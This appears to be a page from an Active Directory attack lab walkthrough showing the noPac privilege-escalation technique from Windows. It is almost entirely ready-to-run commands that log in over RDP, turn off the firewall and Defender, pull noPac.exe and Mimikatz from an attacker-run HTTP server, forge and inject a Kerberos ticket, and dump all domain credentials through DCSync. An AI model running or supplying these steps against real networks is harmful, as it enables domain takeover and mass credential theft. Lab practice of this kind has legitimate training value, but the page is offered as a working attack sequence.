From Windows With noPAC.exe

RDP to NYC

xfreerdp /d:newyork.local /u:mateo.pacheco /p:'elsenorpacheco' /v:192.168.56.10 /size:80%  /cert-ignore

disable firewall and defender

#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"

#disable defender
Set-MpPreference -DisableRealtimeMonitoring $true

Download noPac.exe

wget https://github.com/TryA9ain/noPac/releases/download/v1.0/noPac.exe

Upload noPac.exe

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/noPac.exe', 'C:\Users\mateo.pacheco\desktop\noPac.exe')

Upload Mimikatz

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/mimikatz_trunk.zip', 'C:\Users\mateo.pacheco\desktop\mimikatz_trunk.zip')

Execute noPac.exe

this is going to get a TGT, export it as a .kirbi and import the .kibir as ticket.kirbi

.\noPac.exe /domain newyork.local /dc nyc.newyork.local /mAccount test1b$ /mPassword "TesT1b13!#@" /user donald.trump /pass MaKeam3ricaGr3at /service cifs /ptt

dcsync with mimikatz

.\mimikatz
lsadump::dcsync /domain:newyork.local /all

PreviousFrom Linux With NoPAC.py NextPrintNightmare - Bronx

Last updated 1 year ago